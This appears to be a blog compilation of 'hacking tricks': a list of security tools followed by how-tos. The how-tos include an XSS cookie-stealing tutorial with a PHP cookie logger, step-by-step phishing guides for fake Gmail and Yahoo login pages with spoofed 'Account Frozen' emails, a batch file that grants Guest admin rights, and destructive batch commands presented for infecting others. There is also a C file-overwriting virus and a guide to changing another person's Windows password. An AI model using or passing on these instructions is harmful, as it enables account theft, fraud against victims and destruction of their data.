Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
 
Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
 
Get Nessus Here


3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
 
Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here


6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
 
Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
 
 Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.
 
Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
 
Get Eraser Here

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
 
Get PuTTY Here

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article
 
Get LCP Here


12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
 
Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
 
Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
 
Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
 
Get hping Here
 

-:Page hits flooder:-

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorer method:
make a batch file with these lines

@echo off
:1
start C:Progra~1Intern~1iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1


depending upon your net speed u may increase the 10 secs time wait


with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

-:Asterisk Passwords Using Javascript:-

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

-:Cookie stealing:-

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie.

Here’s an example of what might be in your cookie:
Code:
username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:

Code:
$cookie = $_GET['cookie'];
$log = fopen(”log.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script:

Code:
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:

Code:
Click Me
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.

-:Create your own f@ke login page!!!:-

This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”

Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar.

NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.

I suppose that you created your account at 110mb.com

now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.

Now you can access you file on the net by just typing the url ofthe file.

And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form. 

-:How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other:-

First of all you need to create an account in a form handling service
like http://www.webformdesigner.net/wfd_signup_form.php .
In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps : Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML

Now open the the file yahoofake.html using noepad, here you ll find a code which starts with

( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”)) Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
put the following code after placing your form id:

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page.

Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.



First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”. Now select your site name as mail.yahoo.com/support.

You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.


Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.


Good Luck !


CLICK HERE TO MAKE YOUR OWN FAKE PAGE

-:Internet Error Codes and Meaning:-

Sometime you are browsing the internet and trying to open any website, your e-mail and any FTP sites , but you see different error codes there. You should be familiar with these error codes. You can solve these problems if you are well-known with the meaning of error codes.


Error Codes
Meaning
400 This is bad request error, First check you may be typing wrong URL name and server could not understand your request.
401 You are trying to open any unauthorized access site or page. Check your username and password if you are trying to open any webpage.
402 Payment Required Error
403 You are trying to open any forbidden page and you are blocked by that domain.
404 Here you are trying to open the webpage that was removed or re-named, also check the URL spelling.
408 This is time out error. you should send the request with in time that the server set for you.

-:ASCII Art made easy:-

Do u want to convert ur images into a textual art like this.........






go to this site :::::

 http://www.degraeve.com/img2txt.php#sample

 and make ur own textz......

-:Convert Guest to admin in windows Xp:-

Convert Guest to admin in windows Xp

[Start copying]

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

[End copying]

Copy it in NOTEPAD and save the file as "Guest2admin.bat"

then u can double click the file to execute or run in the cmd.
it works...

Note : Make sure that you have Guest profile on
 

-:Who Used Your Pc In Your Absence:-

Who Used Your Pc In Your Absence,what Did He Do?

first you should go

start > run >eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

 Hope u all will like it.
Thnks n enjoy

-:Start a movie in paint:-

Start A movie in paint!
Start movie in Paint!

* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!

-:How to Format A HDD With Notepad:-

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c: /Q/X — this will format your drive c:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d: /Q/X — this will format your dirve d:

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a: /Q/X — this will format your drive a:

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only




still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C: *.*|y

save it as Dell.bat

want worse then type the following:
@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

-:How to disable the right click functionality on the desktop:-

Follow the given steps to disable the right click functionality on desktop:

To use this feature, you will need to be logged into your computer with administrative rights.
Click Start button and type regedit in Run option then press Enter for next.

Here locate the location to:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Here in right side panel, right click to create a new DWORD value with the name NoViewContextMenu (it is case sensitive), then assign number 1 in value data box.





Now close the registry editor and restart your computer after any changes to go into effect.

But next time, if you want to enable right click functionality on desktop then simply change the value of data box or delete the NoViewContextMenu DWORD item.
 

-:Change someone's windows password:-

This hack works if you are at someone else's home and you are logged into the account of the person whose account you want to hack. This also works if you want to hack someone else's account on your pc bit do not know his/her password.
Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack. RIGHT
CLICK and then click on SET PASSWORD from the pop-up menu.


Enter the new password. Click on OK.

-:Customize Windows Media Player Title Bar:-

Change the title bar to read Windows Media Player provided by , so if I had entered text MAYANK , it would read: Windows Media Player provided by MAYANK.

[Start] [Run] [Regedit]

HKEY_CURRENT_USER>Software>Policies>Microsoft Create the Key [WindowsMediaPlayer] Create String value named [TitleBar]

Data Type: REG_SZ // Value Name: TitleBar
Double click TitleBar and Enter the text to be displayed in the title bar.

Exit Registry / Reboot

-:Countdown timer for shutdown computer:-

Many a times people like to sleep on music, but the problem is that the comp will continue running the whole night. Here is how you can create a countdown timer to shutdown your comp in your specified time.

Go to run in start menu and input this command

shutdown -s -t 3600

this will create a countdown timer which will go off in 3600 seconds (1 Hour). you can replace the 3600 to any time limit you want the comp to shutdown ,but remember the time should always be expressed in seconds i.e if u want the comp to shutdown in Half an hour you have to write 1800 and so on...

If you are as lazy as me and don't want to input the command each time, then create a batch file or shortcut

Batch:
open a notepad and type

shutdown -s -t 3600

now in the files menu select "save as" and save this file as Activate.bat

Just double clicking this file will activate your timer

Shortcut:
On the desktop right click and create a new shortcut. in the location type

shutdown -s -t 3600

Give it any name like "Activate timer"
Again, double clicking this newly created shortcut will do the same.

FORCING THE SHUTDOWN:

another operator that you can use with this command is -f . this will force a shutdown on system. suppose you want the comp to shutdown as quickly as possible you can give command

shutdown -s -f -t 00

here we have used a -f operator and the delay is set to 0 seconds.

(as we are talking about quick shutdown, u can use command
c:windowssystem32tsshutdn.exe 00 /POWERDOWN /DELAY:00 also)

STOPPING THE TIMER:
Any time when you want to stop the running timer use a -a operator(standing for abort)

the command is

shutdown -a

You can use it in any way u prefer, like direct input in run (or command prompt) , create a .bat file or create a shortcut on desktop

SOME OTHER OPTIONS:

shutdown -r (restarting)
shutdown -r -t 3600 (timer for restarting in 1 hour)
shutdown -r -f -t 00 (quick reboot)

-:One-click PC shut down:-

This is really very easy one but very effective one. Enjoy it!

First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c “Rebooting your PC”
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c “Bye Bye m8!”
shutdown -r -t 03 -c “I ll be back m8 !”

Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC.

-:Simple Virus Coding (Only for knowledge purpose):-

Run this on your own responsibility

VIRUS CODE


/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......
*/

#include<stdio.h>
#include<conio.h>

void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}